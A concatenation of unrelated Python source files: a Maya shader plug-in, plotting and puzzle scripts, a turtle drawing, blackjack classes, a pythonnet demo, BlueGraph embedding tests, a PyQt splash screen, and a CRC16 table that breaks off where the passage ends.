            attr.addField(label, index)
        # Default to "Use Value".
        attr.setDefault(0)

    def _makeKeyable(attr):
        # Common flags for user-editable input attributes.
        attr.setKeyable(1)
        attr.setStorable(1)
        attr.setReadable(1)
        attr.setWritable(1)

    try:
        dielectric.mInteriorMaterial = eAttr.create("interiorMaterial", "intmat")
        _makeKeyable(eAttr)
        _addMaterialFields(eAttr)
        dielectric.mIntIOR = nAttr.create("interiorIOR", "intior", OpenMaya.MFnNumericData.kFloat, 1.3)
        _makeKeyable(nAttr)
        dielectric.mExteriorMaterial = eAttr.create("exteriorMaterial", "extmat")
        _makeKeyable(eAttr)
        _addMaterialFields(eAttr)
        dielectric.mExtIOR = nAttr.create("exteriorIOR", "extior", OpenMaya.MFnNumericData.kFloat, 1.0)
        _makeKeyable(nAttr)
        dielectric.mReflectance = nAttr.createColor("specularReflectance", "sr")
        _makeKeyable(nAttr)
        nAttr.setDefault(1.0, 1.0, 1.0)
        dielectric.mTransmittance = nAttr.createColor("specularTransmittance", "st")
        _makeKeyable(nAttr)
        nAttr.setDefault(1.0, 1.0, 1.0)
        # Output attributes: readable only, not stored with the scene.
        dielectric.mOutColor = nAttr.createColor("outColor", "oc")
        nAttr.setStorable(0)
        nAttr.setHidden(0)
        nAttr.setReadable(1)
        nAttr.setWritable(0)
        dielectric.mOutTransparency = nAttr.createColor("outTransparency", "op")
        nAttr.setStorable(0)
        nAttr.setHidden(0)
        nAttr.setReadable(1)
        nAttr.setWritable(0)
    except:
        sys.stderr.write("Failed to create attributes\n")
        raise
    try:
        dielectric.addAttribute(dielectric.mInteriorMaterial)
        dielectric.addAttribute(dielectric.mIntIOR)
        dielectric.addAttribute(dielectric.mExteriorMaterial)
        dielectric.addAttribute(dielectric.mExtIOR)
        dielectric.addAttribute(dielectric.mReflectance)
        dielectric.addAttribute(dielectric.mTransmittance)
        dielectric.addAttribute(dielectric.mOutColor)
        dielectric.addAttribute(dielectric.mOutTransparency)
    except:
        sys.stderr.write("Failed to add attributes\n")
        raise
    try:
        # Only transmittance feeds the computed transparency output.
        dielectric.attributeAffects(dielectric.mTransmittance, dielectric.mOutTransparency)
    except:
        sys.stderr.write("Failed in setting attributeAffects\n")
        raise
# initialize the script plug-in
def initializePlugin(mobject):
    """Register the dielectric shading node with Maya when the plug-in loads."""
    plugin_fn = OpenMayaMPx.MFnPlugin(mobject)
    try:
        plugin_fn.registerNode(kPluginNodeName, kPluginNodeId, nodeCreator,
                               nodeInitializer, OpenMayaMPx.MPxNode.kDependNode,
                               kPluginNodeClassify)
    except:
        sys.stderr.write( "Failed to register node: %s" % kPluginNodeName )
        raise
# uninitialize the script plug-in
def uninitializePlugin(mobject):
    """Deregister the dielectric shading node when the plug-in is unloaded."""
    plugin_fn = OpenMayaMPx.MFnPlugin(mobject)
    try:
        plugin_fn.deregisterNode(kPluginNodeId)
    except:
        sys.stderr.write( "Failed to deregister node: %s" % kPluginNodeName )
        raise
|
#!/usr/bin/env python3
# vim: set ai et ts=4 sw=4:
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
import csv
dates = []
values = {}
with open('ru-newreg.csv', newline = '') as f:
    for row in csv.reader(f, delimiter = ',', quotechar = '"'):
        if dates == []:
            # Header row: "YYYY-MM" column labels -> date objects (day fixed to 01).
            dates = [
                dt.datetime.strptime(
                    "{}-01".format(d),
                    '%Y-%m-%d'
                ).date()
                for d in row[1:]
            ]
            continue
        # BUG FIX: convert the counts to numbers; plotting raw strings makes
        # matplotlib treat the y-axis as categorical instead of numeric.
        values[ row[0] ] = [float(v) for v in row[1:]]
dpi = 80
fig = plt.figure(dpi = dpi, figsize = (512 / dpi, 384 / dpi) )
mpl.rcParams.update({'font.size': 10})
plt.title('RU New Domain Names Registration')
plt.xlabel('Year')
plt.ylabel('Domains')
ax = plt.axes()
ax.yaxis.grid(True)
# Show one tick per year, labelled with the year only.
ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y'))
ax.xaxis.set_major_locator(mdates.YearLocator())
for reg in values.keys():
    plt.plot(dates, values[reg], linestyle = 'solid', label = reg)
plt.legend(loc='upper left', frameon = False)
fig.savefig('domains.png')
|
from utils import Timer
from utils import Vec2
from utils import pi
import math
# Advent of Code puzzle selector.
DAY=24
PART='a'
print("###############################")
print ("Running solution for day {d} part {p}".format(d=DAY, p=PART))
print("###############################")
# Timer comes from the project's utils module — presumably wall-clock; stop() below
# returns the elapsed seconds (TODO confirm against utils).
timer = Timer()
# Write your code here
lines = []
result = 0
def get_final_tile(path):
    """Walk *path* — a string of hex directions (e/se/sw/w/nw/ne with no
    separators) — from the origin and return the final Vec2 position."""
    # Axial offsets for each of the six hex directions.
    deltas = {
        'e': (1, 0), 'se': (1, 1), 'sw': (0, 1),
        'w': (-1, 0), 'nw': (-1, -1), 'ne': (0, -1),
    }
    pos = Vec2(0, 0)
    token = ''
    for ch in path:
        # Accumulate characters until a complete direction token is formed
        # ('n'/'s' alone are never valid, so at most two characters gather).
        token += ch
        if token in deltas:
            dx, dy = deltas[token]
            pos.add(dx, dy)
            token = ''
    return pos
with open('files/day{day}.txt'.format(day=DAY), 'r') as f:
    lines = [l.strip() for l in f.readlines()]
# Tile state keyed by coordinate tuple: True = black, absent/False = white.
tiles = {}
for l in lines:
    key = get_final_tile(l).get_tuple()
    # Toggle the tile; unknown tiles start white (False).
    tiles[key] = not tiles.get(key, False)
# Count the black tiles (True values).
result = sum(tiles.values())
print ("Result = {result}".format(result=result))
# And stop here
execution_time = timer.stop()
print("###############################")
print("Executed in {t} seconds".format(t=execution_time))
print("###############################")
from collections import defaultdict
class Graph:
    """Directed graph on vertices 0..V-1 with a mother-vertex search.

    A mother vertex is one from which every other vertex is reachable.
    """
    def __init__(self, vertices):
        self.V = vertices                # number of vertices
        self.graph = defaultdict(list)   # adjacency list: u -> [v, ...]
    def insert(self,u,v):
        """Add the directed edge u -> v."""
        self.graph[u].append(v)
    def traverse(self, v, visited):
        """Depth-first search from v, marking reachable vertices in *visited*."""
        visited[v] = True
        for neighbour in self.graph[v]:
            if not visited[neighbour]:
                self.traverse(neighbour, visited)
    def findMotherVertex(self):
        """Return [v] for a mother vertex v, or -1 if none exists.

        Kosaraju-style: the vertex whose DFS finishes last in the first pass
        is the only possible candidate; a second DFS verifies it.
        """
        visited = [False]*(self.V)
        candidate = 0
        for i in range(self.V):
            if not visited[i]:
                self.traverse(i, visited)
                candidate = i
        # Verify the candidate actually reaches every vertex.
        visited = [False]*(self.V)
        self.traverse(candidate, visited)
        if all(visited):
            return [candidate]
        return -1
# test change for smartgit
# Demo: a graph with mother vertex 5, then one where 0 is a mother vertex.
g = Graph(7)
for u, v in ((0, 1), (0, 2), (1, 3), (4, 1), (6, 4), (5, 6), (5, 2), (6, 0)):
    g.insert(u, v)
print(g.findMotherVertex())
g = Graph(4)
for u, v in ((2, 1), (2, 0), (1, 2), (0, 2), (0, 3), (3, 3)):
    g.insert(u, v)
print(g.findMotherVertex())
|
import turtle
# Configure the shared turtle screen: logo mode (0 degrees = north, angles go
# clockwise), no automatic redraws (tracer off; scenes call update() instead),
# turtle-shaped cursor, and 0-255 integer RGB colour values.
turtle.mode("logo")
turtle.tracer(False)
turtle.shape("turtle")
turtle.colormode(255)
# Draw one fence board.
def zhalan(x,y,chang,gao):
    """Draw a white filled rectangle at (x, y): chang = width, gao = height."""
    turtle.pu()
    turtle.seth(0)
    turtle.goto(x,y)
    turtle.pd()
    turtle.fillcolor(255,255,255)
    turtle.begin_fill()
    # Outline: height, width, height, then the closing width side.
    for side in (gao, chang, gao):
        turtle.forward(side)
        turtle.right(90)
    turtle.forward(chang)
    turtle.end_fill()
def zhalan_all( ):
    """Draw the whole fence: two horizontal rails and three vertical posts."""
    # (x, y, width, height) for each board, rails first then posts.
    for board in ((-216, -10, 130, 15), (-216, -40, 130, 15),
                  (-190, -60, 15, 80), (-160, -60, 15, 80),
                  (-130, -60, 15, 80)):
        zhalan(*board)
# Draw a cloud (after painting the sky).
def yun(x,y):
    """Paint the cyan sky rectangle, then a white filled cloud anchored at (x, y)."""
    # Sky: filled rectangle instead of turtle.bgcolor(), which flickers here.
    turtle.goto(-480,-60)
    turtle.seth(90)
    turtle.fillcolor(0,255,255)
    turtle.begin_fill()
    turtle.pd()
    for side in (960, 470, 960):
        turtle.forward(side)
        turtle.left(90)
    turtle.forward(470)
    turtle.end_fill()
    # Cloud: three circular arcs closed back to the anchor point.
    turtle.pu()
    turtle.seth(0)
    turtle.pencolor("white")
    turtle.goto(x,y)
    turtle.fillcolor(255,255,255)
    turtle.begin_fill()
    turtle.pd()
    turtle.circle(30, 90)
    turtle.right(90)
    turtle.circle(30, 180)
    turtle.right(90)
    turtle.circle(30, 90)
    turtle.left(90)
    turtle.goto(x,y)
    turtle.end_fill()
    turtle.pensize(1)
# Draw the ground.
def dimian():
    """Draw the orange ground strip and a row of pebble dots on top of it."""
    turtle.pu()
    turtle.seth(0)
    turtle.pensize(0)
    turtle.goto(-480,-60)
    turtle.fillcolor(255,144,48)
    turtle.begin_fill()
    turtle.pd()
    # Rectangle: turn right, then draw each side (960 wide, 340 tall).
    for side in (960, 340, 960, 340):
        turtle.right(90)
        turtle.forward(side)
    turtle.end_fill()
    turtle.pu()
    turtle.pencolor("black")
    # Pebbles spaced quadratically so they bunch toward the left.
    # NOTE(review): the pen stays down after the first dot, so subsequent
    # goto() calls draw connecting lines — confirm that is intended.
    for i in range(10):
        turtle.goto(30+i*i,-59.5)
        turtle.pd()
        turtle.dot(5)
# Draw the body.
def shenti():
    """Draw the body: a filled pale-yellow circle resting on the ground."""
    turtle.pu()
    turtle.seth(90)
    turtle.goto(100,-45)
    turtle.pensize(1)
    turtle.fillcolor(255,255,96)
    turtle.pd()
    turtle.begin_fill()
    turtle.circle(30,360)
    turtle.end_fill()
# Draw the left leg.
def left(x,y):
    """Draw the left leg: a short stroke angled at 195 degrees from (x, y)."""
    turtle.pu()
    turtle.goto(x,y)
    turtle.seth(195)
    turtle.pd()
    turtle.forward(15)
# Draw the right leg.
def right(x,y):
    """Draw the right leg: a short stroke angled at 165 degrees from (x, y)."""
    turtle.pu()
    turtle.goto(x,y)
    turtle.pd()
    turtle.seth(165)
    turtle.forward(15)
# Compose the static background: sky/cloud, fence, ground, body and legs.
# Order matters — later shapes are painted over earlier ones.
def bgpic():
    yun(42,205)
    zhalan_all()
    dimian()
    shenti()
    left(90,-43)
    right(105,-45)
def head(x,y):
    """Draw the head: a filled pale-yellow circle anchored at (x, y)."""
    turtle.pu()
    turtle.seth(330)
    turtle.goto(x,y)
    turtle.pd()
    turtle.fillcolor(255,255,96)
    turtle.begin_fill()
    turtle.circle(15,360)
    turtle.end_fill()
# Draw the beak.
def mouth(x,y):
    """Draw the beak: a brown filled wedge of two strokes meeting at (x, y)."""
    turtle.pu()
    turtle.goto(x,y)
    turtle.pd()
    turtle.fillcolor(192,96,48)
    turtle.begin_fill()
    turtle.seth(165)
    turtle.forward(18)
    turtle.seth(15)
    turtle.forward(18)
    turtle.end_fill()
# Draw the eye.
def eye(x,y):
    """Draw the eye: a tiny filled black circle at (x, y)."""
    turtle.pu()
    turtle.seth(90)
    turtle.goto(x,y)
    turtle.fillcolor(0,0,0)
    turtle.begin_fill()
    turtle.pd()
    turtle.circle(1,360)
    turtle.end_fill()
# Head-down pose (pecking).
def ditou():
    """Redraw the whole scene with the head lowered, then refresh the screen."""
    turtle.clear()
    bgpic()
    head(68,-21)
    mouth(51,-42)
    eye(52,-30)
    turtle.hideturtle()
    turtle.update()  # tracer is off, so redraws must be flushed explicitly
# Head-up pose.
def taitou():
    """Redraw the whole scene with the head raised, then refresh the screen."""
    turtle.clear()
    bgpic()
    head(68,-10)
    mouth(47,-31)
    eye(53,-15)
    turtle.hideturtle()
    turtle.update()  # tracer is off, so redraws must be flushed explicitly
taitou()  # start in the head-up pose
# Keyboard interaction: hold the space bar to lower the head, release to raise it.
turtle.onkeypress(ditou, 'space')
turtle.onkeyrelease(taitou, 'space')
turtle.listen()
turtle.done()
|
from itertools import product
from typing import Union
from model.actions import Action
from model.cards import Card
class State:
    """A blackjack state: the player's current sum, the opponent's visible
    points, and whether the player holds a usable ace (counted as 11)."""
    def __init__(self,
                 current_sum: int,
                 opponent_points: int,
                 holds_usable_ace: bool):
        self.current_sum = current_sum
        self.opponent_points = opponent_points
        self.holds_usable_ace = holds_usable_ace
    @classmethod
    def from_deal(cls, first_card: Card, second_card: Card, opponent_hand: Union[Card, int]):
        """Build the initial state from the player's two dealt cards and the
        opponent's visible hand."""
        current_sum = first_card + second_card
        # Two aces (11 + 11 = 22) would bust immediately; count one as 1.
        if current_sum == 22:
            current_sum = 12
        return State(current_sum=current_sum,
                     opponent_points=opponent_hand,
                     holds_usable_ace=(first_card == Card.ACE or second_card == Card.ACE))
    def __eq__(self, other):
        if isinstance(other, State):
            return self.current_sum == other.current_sum and \
                   self.opponent_points == other.opponent_points and \
                   self.holds_usable_ace == other.holds_usable_ace
        return False
    def __hash__(self):
        # Hash the sorted attribute items so equal states hash equally.
        return hash(tuple(sorted(self.__dict__.items())))
    def move_with(self, card: Card):
        """Return the successor state after drawing *card* (BUST on overflow)."""
        if card != Card.ACE:
            new_sum = self.current_sum + card
            # Over 21 but holding a usable ace: demote the ace from 11 to 1.
            if new_sum > 21 and self.holds_usable_ace:
                return State(new_sum - 10, self.opponent_points, False)
            elif new_sum > 21:
                return BUST
            return State(new_sum, self.opponent_points, self.holds_usable_ace)
        # Drawing an ace: count it as 11 while that cannot bust...
        elif self.current_sum < 11:
            return State(self.current_sum + 11, self.opponent_points, True)
        elif self.current_sum >= 21 and not self.holds_usable_ace:
            return BUST
        # ...otherwise demote the held ace and count the new ace as 1 (net -9).
        elif self.current_sum >= 21 and self.holds_usable_ace:
            return State(self.current_sum - 9, self.opponent_points, False)
        else:
            return State(self.current_sum + 1, self.opponent_points, self.holds_usable_ace)
    @classmethod
    def get_all_demanding_states(cls):
        """All states where the hit/stick decision is non-trivial (sum 12-21)."""
        return [State(current_sum=current_sum,
                      opponent_points=opponent_points,
                      holds_usable_ace=holds_usable_ace)
                for current_sum, opponent_points, holds_usable_ace
                in product(range(12, 22), Card.get_values(), [True, False])]
    @classmethod
    def get_all_states(cls):
        """Every non-bust state (sum 2-21) for each opponent card and ace flag."""
        return [State(current_sum=current_sum,
                      opponent_points=opponent_points,
                      holds_usable_ace=holds_usable_ace)
                for current_sum, opponent_points, holds_usable_ace
                in product(range(2, 22), Card.get_values(), [True, False])]
# Sentinel for a busted hand (> 21); compares equal only to itself.
BUST = State(None, None, None)
class StateActionPair:
    """A hashable (state, action) pair, usable as a dictionary key."""
    def __init__(self, state: State, action: Action):
        self.state = state
        self.action = action
    def __eq__(self, other):
        return (isinstance(other, StateActionPair)
                and (self.state, self.action) == (other.state, other.action))
    def __hash__(self):
        # Hash the sorted attribute items so equal pairs hash equally.
        return hash(tuple(sorted(self.__dict__.items())))
|
__author__ = 'georg.michlits'
# Concatenate two text files into a third, in order.
# BUG FIX: the first two prompts were swapped (filename_1 asked for
# "filename_2" and vice versa).
filename_1 = input('enter filename_1 (path): ')
filename_2 = input('enter filename_2 (path): ')
file_merge_name = input('enter merged file_filename: ')
# Context managers guarantee the files are closed even on error.
with open(file_merge_name, 'w') as file_merge:
    print('reading in file1')
    with open(filename_1, 'r') as file1:
        for line in file1:
            file_merge.write(line)
    print('finished')
    print('reading in file2')
    with open(filename_2, 'r') as file2:
        for line in file2:
            file_merge.write(line)
print('finished')
|
# def max_pairwise_product(numbers):
#
# n = len(numbers)
# max_product = 0
# for first in range(n):
# for second in range(first + 1, n):
# multiplication_in_between = numbers[first] * numbers[second]
# max_product = max(max_product, multiplication_in_between)
# return max_product
def optimal_pairwise(numbers):
    """Return the largest product of two elements at distinct positions.

    Fixes over the original: the caller's list is no longer sorted in place,
    the redundant max() scan after sorting is gone, and the no-op
    int(float(...)) round-trip is removed. Requires len(numbers) >= 2.
    """
    ordered = sorted(numbers)
    # The two largest values give the maximum product for this input model.
    return ordered[-1] * ordered[-2]
if __name__ == '__main__':
    # First input line: the element count (read for protocol compatibility,
    # not otherwise used).
    provided_numbers = int(float(input()))
    converted_numbers_toIntegers = [
        int(float(token)) for token in input().split()
    ]
    # print(max_pairwise_product(converted_numbers_toIntegers))
    print('the test', optimal_pairwise(converted_numbers_toIntegers))
|
# Demo: calling into a .NET assembly (TestDLL) from Python via pythonnet (clr).
import clr
import sys
import System
sys.path.append(r'E:\code\vs\Console\TestDLL\bin\Debug')
d = clr.AddReference('TestDLL')
from TestDLL import *
m = MasterImpl()
s = m.GetString()
print(s)
m.SetMessage("Hello Python")
s = m.GetString()
print(s)
# Calling a method that returns bytes.
a = b'1234'
print(a)
print(str(a, encoding="utf-8"))
meta = m.GetMeta(a)
b = meta.get_value()
lb = bytes(b)
print(lb)
s = str(lb, encoding="utf-8")
print(s)
# Event
# NOTE(review): this first handler is immediately shadowed by the second
# definition below and never registered; it also reads a.PackageMessage where
# `a` is the bytes literal above — confirm which handler was intended.
def handler(source,args):
    print(a.PackageMessage)
def handler(source, args):
    print('my_handler called!')
m.packageEventHandller += handler
m.packageEventHandller += lambda s,a: print("lambda event")
m.GetString()
#exception
try:
    m.Raise()
except TestException as e:
    print(e.Message)
print("ok")
# BlueGraph: unifying Python framework for graph analytics and co-occurrence analysis.
# Copyright 2020-2021 Blue Brain Project / EPFL
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bluegraph.backends.stellargraph import StellarGraphNodeEmbedder
from bluegraph.backends.neo4j import (Neo4jNodeEmbedder, pgframe_to_neo4j,
Neo4jGraphView)
def _execute(driver, query):
    """Run *query* in a fresh Neo4j session and return the records as a list
    of dicts.

    The session is closed even when the query raises (the original leaked the
    session on error).
    """
    session = driver.session()
    try:
        result = session.run(query)
        result = result.data()
    finally:
        session.close()
    return result
def _get_embedding_props(neo4j_driver, node_label, prop_name):
    """Fetch {node_id: embedding} for every node carrying *node_label*."""
    records = _execute(
        neo4j_driver,
        f"MATCH (n:{node_label}) "
        f"RETURN n.id as node_id, n.{prop_name} as emb"
    )
    return dict((record["node_id"], record["emb"]) for record in records)
def test_stellar_node_embedder(node_embedding_test_graph,
                               node_embedding_prediction_test_graph):
    """Exercise every StellarGraphNodeEmbedder model on the test graphs."""
    # Smoke test: fit node2vec without asserting on the result.
    embedder = StellarGraphNodeEmbedder(
        "node2vec", length=10, number_of_walks=20)
    embedding = embedder.fit_model(
        node_embedding_test_graph)
    embedder = StellarGraphNodeEmbedder(
        "complex", embedding_dimension=6, epochs=5)
    embedding = embedder.fit_model(
        pgframe=node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 6)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    embedder = StellarGraphNodeEmbedder(
        "distmult", embedding_dimension=10, epochs=5)
    embedding = embedder.fit_model(
        pgframe=node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 10)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    embedder = StellarGraphNodeEmbedder(
        "attri2vec", feature_props=["age", "height", "weight"],
        embedding_dimension=3, epochs=5,
        length=5, number_of_walks=3)
    node_embedding_test_graph.nodes(raw_frame=True)
    embedding = embedder.fit_model(pgframe=node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 3)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    embeddings = embedder.predict_embeddings(
        node_embedding_prediction_test_graph
    )
    assert(len(embeddings) == 4)
    assert(
        set(node_embedding_prediction_test_graph.nodes()) ==
        set(embeddings.index))
    embedder = StellarGraphNodeEmbedder(
        "graphsage", feature_props=["age", "height", "weight"],
        embedding_dimension=3, epochs=5,
        length=5, number_of_walks=3)
    node_embedding_test_graph.nodes(raw_frame=True)
    embedding = embedder.fit_model(
        pgframe=node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 3)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    embeddings = embedder.predict_embeddings(
        node_embedding_prediction_test_graph
    )
    assert(len(embeddings) == 4)
    assert(
        set(node_embedding_prediction_test_graph.nodes()) ==
        set(embeddings.index))
    # Round-trip the fitted embedder through save/load.
    embedder.save("stellar_sage_emedder", compress=True)
    embedder = StellarGraphNodeEmbedder.load(
        "stellar_sage_emedder.zip")
    embedder.info()
    embedder = StellarGraphNodeEmbedder(
        "gcn_dgi", feature_props=["age", "height", "weight"],
        batch_size=4, embedding_dimension=5)
    embedding = embedder.fit_model(
        node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 5)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    # BUG FIX: this section (and gat_dgi below) assigned the result to
    # `embeddings` while the assertions checked the stale `embedding` left
    # over from the previous model.
    embedder = StellarGraphNodeEmbedder(
        "cluster_gcn_dgi", feature_props=["age", "height", "weight"],
        batch_size=4, embedding_dimension=5, clusters=4, clusters_q=2)
    embedding = embedder.fit_model(
        node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 5)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    embeddings = embedder.predict_embeddings(
        node_embedding_prediction_test_graph)
    assert(len(embeddings) == 4)
    assert(
        set(node_embedding_prediction_test_graph.nodes()) ==
        set(embeddings.index))
    embedder = StellarGraphNodeEmbedder(
        "gat_dgi", feature_props=["age", "height", "weight"],
        batch_size=4, embedding_dimension=5)
    embedding = embedder.fit_model(
        node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 5)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
    embedder = StellarGraphNodeEmbedder(
        "cluster_gat_dgi", feature_props=["age", "height", "weight"],
        batch_size=4, embedding_dimension=5, clusters=4, clusters_q=2)
    embeddings = embedder.fit_model(
        node_embedding_test_graph)
    assert(len(embeddings["embedding"].iloc[0]) == 5)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embeddings.index))
    embeddings = embedder.predict_embeddings(
        node_embedding_prediction_test_graph)
    assert(len(embeddings) == 4)
    assert(
        set(node_embedding_prediction_test_graph.nodes()) ==
        set(embeddings.index))
    embedder = StellarGraphNodeEmbedder(
        "graphsage_dgi", feature_props=["age", "height", "weight"],
        batch_size=4, embedding_dimension=5)
    embedding = embedder.fit_model(
        node_embedding_test_graph)
    assert(len(embedding["embedding"].iloc[0]) == 5)
    assert(
        set(node_embedding_test_graph.nodes()) ==
        set(embedding.index))
def test_neo4j_node_embedder(node_embedding_test_graph,
                             node_embedding_prediction_test_graph,
                             neo4j_driver):
    """Exercise the Neo4j GDS embedders (node2vec, fastrp, graphsage)."""
    node_label = "TestPerson"
    edge_label = "TEST_KNOWS"
    # Populate neo4j with the test property graph
    pgframe_to_neo4j(
        pgframe=node_embedding_test_graph, driver=neo4j_driver,
        node_label=node_label, edge_label=edge_label)
    # Testing node2vec stream
    embedder = Neo4jNodeEmbedder(
        "node2vec",
        embeddingDimension=6, walkLength=20, iterations=1,
        edge_weight="weight")
    embedding = embedder.fit_model(
        driver=neo4j_driver, node_label=node_label, edge_label=edge_label)
    assert(len(embedding["embedding"].iloc[0]) == 6)
    # Alternatively, create a graph view
    graph_view = Neo4jGraphView(
        neo4j_driver, node_label=node_label, edge_label=edge_label)
    # Testing node2vec write
    embedder.fit_model(
        graph_view=graph_view,
        write=True, write_property="node2vec")
    emb = _get_embedding_props(neo4j_driver, node_label, "node2vec")
    assert(len(emb) == 7)
    assert(set(embedding.index) == set(emb.keys()))
    # Testing fastrp stream
    embedder = Neo4jNodeEmbedder(
        "fastrp", embeddingDimension=25,
        edge_weight="weight")
    embedding = embedder.fit_model(graph_view=graph_view)
    assert(len(embedding["embedding"].iloc[0]) == 25)
    # Testing fastrp write
    embedding = embedder.fit_model(
        graph_view=graph_view,
        write=True, write_property="fastrp")
    emb = _get_embedding_props(neo4j_driver, node_label, "fastrp")
    assert(len(list(emb.values())[0]) == 25)
    # Testing GraphSage train and stream predict
    embedder = Neo4jNodeEmbedder(
        "graphsage", feature_props=["age", "height", "weight"],
        embeddingDimension=3)
    embedding = embedder.fit_model(graph_view=graph_view)
    # `emb` still holds the fastrp results; only its node-id set (the same
    # 7 nodes) is compared here.
    assert(len(emb) == 7)
    assert(set(embedding.index) == set(emb.keys()))
    assert(len(embedding["embedding"].iloc[0]) == 3)
    # Testing GraphSage write predicts (passing all the credentials)
    embedder.predict_embeddings(
        pgframe=node_embedding_prediction_test_graph,
        driver=neo4j_driver,
        node_label="TestPredictPerson",
        edge_label="TEST_PREDICT_KNOWS",
        write=True, write_property="graphsage"
    )
    # BUG FIX: read back the "graphsage" property just written; the original
    # fetched "fastrp", which was never written on TestPredictPerson nodes.
    emb = _get_embedding_props(neo4j_driver, "TestPredictPerson", "graphsage")
    assert(len(emb) == 4)
    assert(
        set(node_embedding_prediction_test_graph.nodes()) ==
        set(emb.keys()))
    test_graph_view = Neo4jGraphView(
        neo4j_driver,
        node_label="TestPredictPerson",
        edge_label="TEST_PREDICT_KNOWS")
    # Testing GraphSage write predicts (passing graph view)
    embedder.predict_embeddings(
        graph_view=test_graph_view,
        write=True, write_property="graphsage"
    )
    # BUG FIX: same as above — verify the "graphsage" property.
    emb = _get_embedding_props(neo4j_driver, "TestPredictPerson", "graphsage")
    assert(len(emb) == 4)
    assert(
        set(node_embedding_prediction_test_graph.nodes()) ==
        set(emb.keys()))
    # Round-trip the fitted embedder through save/load.
    embedder.save("neo4j_sage_emedder", compress=True)
    embedder = Neo4jNodeEmbedder.load("neo4j_sage_emedder.zip")
    embedder.info()
|
from PyQt5.QtGui import QColor, QPixmap
from PyQt5.QtWidgets import QApplication, QSplashScreen, QMainWindow
from PyQt5.QtCore import Qt
# Generate the splash screen
class SplashScreen:
    """Context-manager wrapper around QSplashScreen.

    Shows the splash image on __enter__ and, on __exit__, reveals the window
    registered via *after* (or set_after) before dismissing the splash.
    """
    def __init__(self, parent, image=None, after=None):
        self.app = parent
        pixmap = QPixmap(image).scaled(
            500, 500, Qt.KeepAspectRatio, Qt.SmoothTransformation)
        self.splash = QSplashScreen(
            pixmap, Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)
        self.splash.setMask(pixmap.mask())
        self.after = after
    def set_after(self, after):
        """Register the window to reveal once the splash screen closes."""
        self.after = after
    def __enter__(self):
        self.splash.show()
        self.app.processEvents()
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        self.after.show()
        self.splash.finish(self.after)
    def status_update(self, msg):
        """Show *msg* centred over the splash image and repaint."""
        self.splash.showMessage(
            msg, alignment=Qt.AlignHCenter, color=QColor(235, 239, 242))
        self.app.processEvents()
class Application(QApplication):
    # Placeholder subclass so application-wide behaviour can be added later.
    pass
|
"""A collection of Pacman CRCField compatible CRC algorithms"""
import binascii
#==============================================================================
# CRC16 CCITT
#==============================================================================
# Table driver crc16 algorithm. The table is well-documented and was
# generated in this case by using pycrc (https://github.com/tpircher/pycrc)
# using the following command-line:
#
# ./pycrc.py --model=ccitt --generate table
CRC16_CCITT_TAB = \
[
    0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
    0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
    0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
    0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
    0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
    0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
    0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
    0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
    0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
    0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
    0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
    0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
    0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
    0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
    0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
    0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
    0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
    0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
    0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
    0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
